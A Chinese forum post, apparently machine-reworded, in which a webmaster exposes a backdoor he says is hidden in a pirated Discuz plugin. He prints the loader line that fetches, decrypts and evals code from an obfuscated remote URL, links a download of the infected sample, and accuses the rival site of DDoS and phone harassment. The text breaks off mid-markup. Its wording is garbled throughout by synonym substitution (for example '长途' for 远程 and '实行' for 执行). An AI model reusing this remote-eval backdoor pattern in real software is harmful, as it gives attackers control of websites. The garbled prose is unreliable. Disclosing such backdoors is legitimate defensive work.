【续集】魔趣吧的东西真的有后门木马，揭秘用盗版的危害

手游

上次写了一篇文章 披露了盗版市场的乱象 ，没想到本人遭到魔趣吧的站长疯狂的报复。我本身的网站已经持续快10天被魔趣吧的站长使用DDOS攻击技术，打不开了！由于在其网站进行了手机绑定，手机也整天被短信+电话轰炸！搞的我近来经常要开飞行模式！
但是我是绝对不会像黑恶权势低头的，大不了我网站不做了，手机号码不用了！

前文回顾：魔趣吧的东西好像真的有后门木马，改了我dz的后台密码
https://www.dismall.com/thread-5095-1-1.html

由于前面的那篇文章写的比力概况，没有列举证据（导致其大肆误导不明原形的群众说我在造谣），今天我就来列举一些证据，并对已知的后门进行深入详细的分析！
这可能是最后一篇曝光盗版市场乱象的文章了，由于我只是一个普普通通的站长！那些江湖履历丰富的站长我惹不起，我也见识了魔趣吧是假如把黑的说成白的！

他的理念就是：只要对他有利的都是好文章，曝光他的都是在造谣他！

在正式进入主题之前，我想在说几句题外话：先不说他有没有干些见不得人的事，其损坏原创开辟者权益，谋取本身的长处(俗称：盗版)，还有什么资格在那一副正人君子的模样怼这个怼那个！

【下面才是今天要说的主题】
由于带后门的资源有点多，今天我就随便拿个在魔趣吧收费的资源，且我之前安装过，受害的资源来做分析！

样本下载链接：为了不给他打广告，帖子ID： 9183 ，知道他网站的随便打开一个帖子把id换成这个就可以定位到！

由于是VIP资源，以是我分享到了蓝奏网盘：https://wws.lanzous.com/iH9IQe6jymf  密码:c9mx

附件MD5值：C03B189CA9E0EA7F1229F609A48EC705
防止由于我的曝光，他会修改附件，然后狡辩！对本文有异议的朋侪可以在本文发布不久的时候，前去下载对比MD5值后，并效验是不是存在本文提到的后门木马！

样本插件名称：积分提现中心 V1.2

木马文件所在路径：keke_tixian\function\function_core.php


木马完整代码：

关键代码：

• $iloveyou = caidi($oo);eval($iloveyou(strip_tags(contentz($love))));
  

有了这些信息 我们下面进行分析(在这里大胆的猜测一下：文件完满是魔趣吧本身加进去的，正版可能就没有这个文件，由于这个文件代码满是和后门有关！和插件自身功能没有关系)
在关键代码前面的都是木马伪装所需要用到的函数 实行过程如下：
1/----------------------

后门脚本实行入口：keke_tixian\admin.inc.php
关键代码在该文件第7行：引用后门文件并实行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
表明：只要安装插件一打开后台的插件设置，木马就主动实行了！

2/--------依次实行----------


$iloveyou = caidi($oo);
表明：定义一个名为   iloveyou 的变量  ,值为： caidi($oo)
调试： $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ，得到 iloveyou 的值即是：decrypt
备注：函数 caidi 定义并赋值了  $love  作全局变量， love 的值即是：htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次实行----------

eval($iloveyou(strip_tags(contentz($love))));

表明：已知 iloveyou 的值即是：decrypt，得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函数 contentz 得知该函数 是访问长途链接并返回内容，相称于 curl
分析函数 decrypt 得知该函数 是进行内容解密，直接调用了DISCUZ自带的解密函数 authcode


表明的表明：代码 eval($iloveyou(strip_tags(contentz($love)))); ，颠末层层分析，终极为：
实行脚本 ( 解密 ( 访问长途代码 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次实行----------

因 htt去p://zonekey.w掉in/b中ai文duseo.xml 该链接如今访问返回的全部是 1111111111111111，以是无法继续分析长途的代码是什么！

可能魔趣吧站长已经知道我接下来会深入曝光他。以是暂时把长途代码先全部改成了 1111111111111111
即使是这样！又如何？ 实行长途脚本 有什么危害？信赖做网站的都知道！这里我不进行科普！感兴趣的站长可以百度自行科普：例：一句话木马，菜刀！
下面的代码是我网站主动多出来的一个文件：由于无法继续分析，直接看结果
<ol>